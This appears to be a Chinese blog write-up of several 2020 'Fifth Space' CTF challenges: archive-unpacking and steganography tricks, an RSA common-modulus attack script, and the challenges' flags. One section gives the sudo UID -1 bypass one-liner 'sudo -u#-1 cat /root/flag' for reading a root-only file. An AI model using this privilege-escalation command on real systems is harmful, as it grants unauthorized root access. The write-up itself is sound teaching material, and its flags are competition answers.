图片图层隐写_【2020 “第五空间”】智能安全大赛 WP

最新推荐文章于 2024-01-16 10:44:39 发布
最新推荐文章于 2024-01-16 10:44:39 发布
阅读量448 收藏
点赞数
文章标签: 图片图层隐写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36245388/article/details/113553079
版权
本文介绍了2020年‘第五空间’智能安全大赛中的图片图层隐写题目,包括如何使用Python进行解压、隐写内容查找以及利用PNG文件格式和图层隐写解密的技巧,最终成功解密获取flag。
摘要由CSDN通过智能技术生成

[MISC] loop

考察点:写脚本解压缩包

简单题,以前也遇到过,照着脚本修改一下就行了

file解压 - > tarfile解压 - > zipfile解压 - >tarfile解压 - > zipfile解压 ...

f0c51d910c3a

用手撸肯定不行的,咱们用python

import os

import tarfile

import zipfile

t = 0

while 1:

# t记录解压次数

t = t+1

# 获取当前目录文件名

filelist = os.listdir()

# 第一次时,使a="file"

for i in filelist:

if "file" in i:

a=i

break

# 如果文件名不包含"file",则暂停

if "file" not in a:

print("Done!")

break

# 如果是tarfile,tar解压方式

if a[:3]=="tar":

tar = tarfile.open(a, mode = "r:tar")

tar.extractall()

tar.close()

# 如果是zipfile,zip解压方式

if a[:3]=="zip":

tar = zipfile.ZipFile(a,"r")

tar.extractall()

tar.close()

print("delete {}, {}".format(a,t))

最后得到的是动态flag

[MISC] philosopher

考察点:隐写内容查找,png文件格式

题目挺简单,干扰项挺多,主要靠发现细节的能力

f0c51d910c3a

在010editor内找到敏感信息“FL4G LOVE”,紧接着就是"IHDR“(49484452),这是png文件头包含的信息,咱们把他的文件头(89504E47)补上

f0c51d910c3a

保存为png,得到flag{that_is_not_right_man}

f0c51d910c3a

[MISC] run

考察点:隐写内容查找,图层隐写

题目挺简单,干扰项挺多(有不少师傅逆向程序,陷入了md5加密的坑),只学会了用PS...

对run.exe进行foremost分离,得到压缩包。解压,再运行run.exe,得到tif文件

f0c51d910c3a

在tif里找到有用信息:njCp1HJBPLVTxcMhUHDPwE7mPW

f0c51d910c3a

从run.exe还分离出了jpg,打开

f0c51d910c3a

发现右下角的黑色长方形很可疑(仿佛遮住了什么,而且他和tif的图片是一模一样的,一定有啥关系),先他弄开

f0c51d910c3a

这就对了,结合前面tif的信息写解密脚本(注意这里的i是从1开始的!!!泪目)

c="njCp1HJBPLVTxcMhUHDPwE7mPW"

flag=""

for i in range(1,len(c)+1):

if i%2==0:

x=ord(c[i-1])+1

else:

x=ord(c[i-1])-1

flag+=chr(x)

print(flag)

flag{mkBq0IICOMUUwdLiTICQvF6nOX}

[MISC] 麒麟系统

考察点:sudo的CVE漏洞

第一次做出这种题,不过也不算难,网上查得到

普通用户在Ubuntu下,不用” su root “切换到root用户,通常/root目录是不能访问的

假如pwn题中,在/root下放置一个FLAG,出题人在/etc/sudoers中添加一个普通用户可以执行ls与cat命令,则可以通过此方法提权从而拿到FLAG

这题直接参考了某pwn爷的复现秒解了

若用户执行 /usr/bin/id

>>sudo id

则出现报错

>>对不起,用户无权以 root 的身份在 localhost.localdomain 上执行 /bin/id

而sudo 有个参数 “-u” 可以指定特定的UID执行命令

此时漏洞点就在于 当-u指定的UID为-1 或者 4294967295的时候,则会以root权限执行命令

先登录:ssh 用户名@ip -p 端口

再提权拿flag:sudo -u#-1 cat /root/flag

[CRYPTO] rosb

考察点:RSA共模攻击

签到题

from flag import flag

from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime

from os import urandom

# 返回n,e,p,q

def gen_arg():

p=getPrime(1024)

q=getPrime(1024)

open("log.txt","w").write(hex(p)+"\n"+hex(q))

n=p*q

e=getPrime(32)

return n,e,p,q

# 明文前4个字符为"rose"

def mamacheck(c):

if long_to_bytes(c)[0:4]!="rose":

return False

return True

def babasay(m):

n,e,p,q=gen_arg()

c=pow(m,e,n)

print hex(n)

print hex(e)

print hex(c)

# 找到满足条件的e

if not mamacheck(c):

e=getPrime(32)

c = pow(m, e, n)

print hex(e)

print hex(c)

# 密文是flag+随机产生64个字节的字符

m=bytes_to_long(flag+urandom(64))

babasay(m)

'''otuput:

n=0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557L

e=0xf4c1158fL

c=0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707L

e2=0xf493f7d1L

c2=0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcbL

'''

n是一样的,c和e有不同的两组,rsa加密方式,可以进行共模攻击

import gmpy2 as gp

def exgcd(a, b):

if b==0:

return 1, 0, a

x2, y2, r = exgcd(b, a%b)

x1 = y2

y1 = x2-(a//b)*y2

return x1, y1, r

c1=gp.mpz(0x2f6546062ff19fe6a3155d76ef90410a3cbc07fef5dff8d3d5964174dfcaf9daa003967a29c516657044e87c1cbbf2dba2e158452ca8b7adba5e635915d2925ac4f76312feb3b0c85c3b8722c0e4aedeaec2f2037cc5f676f99b7260c3f83ffbaba86cda0f6a9cd4c70b37296e8f36c3ceaae15b5bf0b290119592ff03427b80055f08c394e5aa6c45bd634c80c59a9f70a92dc70eebec15d4a5e256bf78775e0d3d14f3a0103d9ad8ea6257a0384091f14da59e52581ba2e8ad3adb9747435e9283e8064de21ac41ab2c7b161a3c072b7841d4a594a8b348a923d4cc39f02e05ce95a69c7500c29f6bb415c11e4e0cdb410d0ec2644d6243db38e893c8a3707)

e1=gp.mpz(0xf4c1158f)

c2=gp.mpz(0xd32dfad68d790022758d155f2d8bf46bb762ae5cc17281f2f3a8794575ec684819690b22106c1cdaea06abaf7d0dbf841ebd152be51528338d1da8a78f666e0da85367ee8c1e6addbf590fc15f1b2182972dcbe4bbe8ad359b7d15febd5597f5a87fa4c6c51ac4021af60aeb726a3dc7689daed70144db57d1913a4dc29a2b2ec34c99c507d0856d6bf5d5d01ee514d47c7477a7fb8a6747337e7caf2d6537183c20e14c7b79380d9f7bcd7cda9e3bfb00c2b57822663c9a5a24927bceec316c8ffc59ab3bfc19f364033da038a4fb3ecef3b4cb299f4b600f76b8a518b25b576f745412fe53d229e77e68380397eee6ffbc36f6cc734815cd4065dc73dcbcb)

e2=gp.mpz(0xf493f7d1)

n=gp.mpz(0xa1d4d377001f1b8d5b2740514ce699b49dc8a02f12df9a960e80e2a6ee13b7a97d9f508721e3dd7a6842c24ab25ab87d1132358de7c6c4cee3fb3ec9b7fd873626bd0251d16912de1f0f1a2bba52b082339113ad1a262121db31db9ee1bf9f26023182acce8f84612bfeb075803cf610f27b7b16147f7d29cc3fd463df7ea31ca860d59aae5506479c76206603de54044e7b778e21082c4c4da795d39dc2b9c0589e577a773133c89fa8e3a4bd047b8e7d6da0d9a0d8a3c1a3607ce983deb350e1c649725cccb0e9d756fc3107dd4352aa18c45a65bab7772a4c5aef7020a1e67e6085cc125d9fc042d96489a08d885f448ece8f7f254067dfff0c4e72a63557)

r1, r2, t = exgcd(e1, e2)

m = gp.powmod(c1, r1, n) * gp.powmod(c2, r2, n) % n

#print(m)

#print(hex(m)[2:])

print(bytes.fromhex(str(hex(m)[2:])))

flag{g0od_go0d_stu4y_d4yd4y_Up}

金知
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
图片图层隐写_图片隐写隐写分析
weixin_35231383的博客
01-17 1824
两句闲话老师在课上讲了许多图片隐写隐写分析的方法,在这里我整合一下,并对部分进行代码实现。LSB隐写LSB隐写是最基础、最简单的隐写方法,具有容量大、嵌入速度快、对载体图像质量影响小的特点。LSB的大意就是最低比特位隐写。我们将深度为8的BMP图像,分为8个二值平面(位平面),我们将待嵌入的信息(info)直接写到最低的位平面上。换句话说,如果秘密信息与最低比特位相同,则不改动;如果秘密信息与最...
图片图层隐写_关于 CTF 图片相关题目的一些套路
weixin_30724041的博客
01-17 1127
本系列慢更 一旦接触到新的套路就会收集1: 将 flag 存储在图片详细信息中这个套路建议用 Windows 系统查看,貌似 Windows 上显示信息要多一些。像在我的 Mac OS 上这个 flag 就显示不出来。所以建议非 Windows 用户配备一个 Windows 虚拟机,毕竟 Windows 虽然比较丑,但是功能性和易用性都没的说。2: 将 flag 存储在某个 PS 文件的图层中这里...
[“第五空间智能安全大赛 2020] misc 复现
qq_49422880的博客
03-25 1037
["第五空间"智能安全大赛 2020] misc 复现loop loop 010打开文件发现是zip文件,解压出现tarfile,继续使用tar xvftarfile进行解压,出现zipfile,使用uzip zipfile,出现tarfile。根据题意应该是要继续套的,脚本直接解决。 import os while True: os.system('tar -xvf tarfile') os.system('rm tarfile') os.system('unzip zipfi
图片图层隐写_图像隐写软件(Confidential)下载 v1.0
weixin_42549723的博客
01-17 475
Confidential图像隐写软件是老外发明的一款可以将图像和文本隐藏于可见图像中的工具,对图片的有效性进行保护,操作简单,使用方便,很好的保护你的信息安全,如果你需要制作类似内涵图的隐藏图片,可以下载烈火网小编推荐的这款Confidential软件哦。基本简介Confidential是一款很强大的图像隐写软件,可以将图像、文本或者图片+文本信息隐写到一张图片中,此技术也称之为“隐写术”,隐写后...
2020 "第五空间"智能安全大赛 Re nop
Hk_Mayfly的博客
06-27 690
测试文件:https://wwa.lanzous.com/is4hte2ulfc 代码处理 这道题是花指令相关题目,利用int 80h做中断。 首先将包含int 80h中断的sub_804857B,sub_80485C4函数和反调试函数sub_804865B全部nop掉。 接着,将 push 地址 ... pop ebx jmp ebx 这种形式的代码,都修改为 jmp 地...
第五届GIS技能大赛空间分析--构建学校到目的地的最短路径
02-16
第五届GIS应用技能大赛聚焦于“构建学校到目的地的最短路径”这一主题,旨在通过实际操作,提升参赛者对GIS技术的理解和运用能力。 首先,我们要理解什么是最短路径问题。在地理空间中,最短路径通常是指两点之间...
PS算法-图层混合.zip_图层_图层混合_图层
09-24
在压缩包文件"PS算法-图层混合"中,可能包含了源代码、示例图片和详细的步骤说明,用于演示如何在VS中实现图层混合功能,并与PS的结果进行比较。通过学习这些内容,不仅可以掌握图像处理的基本原理,还能提升编程...
MOlink.rar_mo 图层加载_moli_vb mo_vb+mo_visual basic
09-14
标题中的“MOlink.rar_mo 图层加载_moli_vb mo_vb+mo_visual basic”表明这是一个关于使用Visual Basic(VB)和MO库进行图层加载的项目,其中可能包含一个名为"MOlink"的程序或者模块。"moli"可能是MO库的一个特定...
Layer-settings.zip_CAD二次开发_VB CAD图层_cad图层_vb cad 图层_图层
09-24
5. 删除图层:使用适当的命令删除不再需要的图层,但需要注意不能删除包含对象的图层。 6. 图层操作:例如,将对象移动到不同图层,或复制图层设置到其他图层。 在实际开发中,VB脚本可以通过AutoCAD的ActiveX接口...
easymaprelease.rar_vc 图层_图层
07-13
在本项目中,"easymaprelease.rar_vc 图层_图层" 是一个与VC++编程相关的资源,主要涉及地图图层管理和图层上的要素操作。通过这个压缩包,我们可以学习如何在C++环境中实现地图应用的核心功能,包括图层的创建、...
图片图层隐写_图片隐写--XOR&OR&and
weixin_28743405的博客
01-17 290
图片xor的脚本和图片进行xor or and 运算的脚本from PIL import Image#import pildef loadImage(filename):img = Image.open(filename)width, height = img.sizeimg = img.convert("RGB")pixel = img.load()return width, height, p...
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 809
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
php代码隐写图片,BlackRose: 1-VulnHub
weixin_39685697的博客
03-19 403
0x01 下载下载地址:https://www.vulnhub.com/entry/blackrose-1,509/由于国外访问较慢,这里下载后的文件已经传到了网盘网盘链接:https://pan.baidu.com/s/1FGc7RPXnerkcydqN9i86Gw提取码:5whzPS:下载vulnhub里面的镜像可以使用FDM这款工具,挂到机器上慢慢下。0x02 安装这里推荐直接使用virtu...
Sudo浅谈
weixin_33720956的博客
06-27 166
在Linux系统中, Sudo是最重要的命令之一,关系到整个系统的操作安全。 sudo命令是用来以其它的身份来执行命令,预设的身份是root。配置文件是/etc/sudoers,权限为440,下面来了解下其基本设置:[root@localhost sbin]# visudo## Allow root to run any commands anywherero...
2021-第五空间智能安全大赛-PNG图片转换器 | 管道符与反引号的配合、open()函数绝杀
一醉一休的博客
09-23 1060
值得复盘的题目!
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3174
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
第三届“第五空间”网络安全大赛初赛部分WP
七堇年的博客
12-24 2237
第三届“第五空间”网络安全大赛初赛WP
【图像隐写】计算全息半色图像信息隐藏【含Matlab源码 3786期】
最新发布
Matlab领域的博客
01-16 922
计算全息半色图像信息隐藏 完整的代码,方可运行;可提供运行操作视频!适合小白!
图片隐写——stegdetect
热门推荐
今天吃什么
01-26 2万+
在SDUTSec上的一道MISC 研究了老长时间,把之前能用的工具手段都用到了,依然没用。 直到后来偶然看到一篇博客,才有所启发misc_ - 1go0 - 博客园 了解到这道题应该用stegdetect来解时,现在我们来重新看一下这道题: 1.将图片复制到stegdetect.exe所在目录下,右键PowerShell命令stegdetect.exe -tjopi -s 10.0 hide.jp...
ArcGIS矢量数据模型:图层与空间数据库解析
"本文将探讨ArcGIS的矢量数据模型,特别是图层和空间数据库的概念。ArcGIS中的图层作为矢量数据的核心组成部分,被存储为目录,其名称即为图层名。图层可以组合成工作空间,而工作空间不仅包含图层,还有INFO目录,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值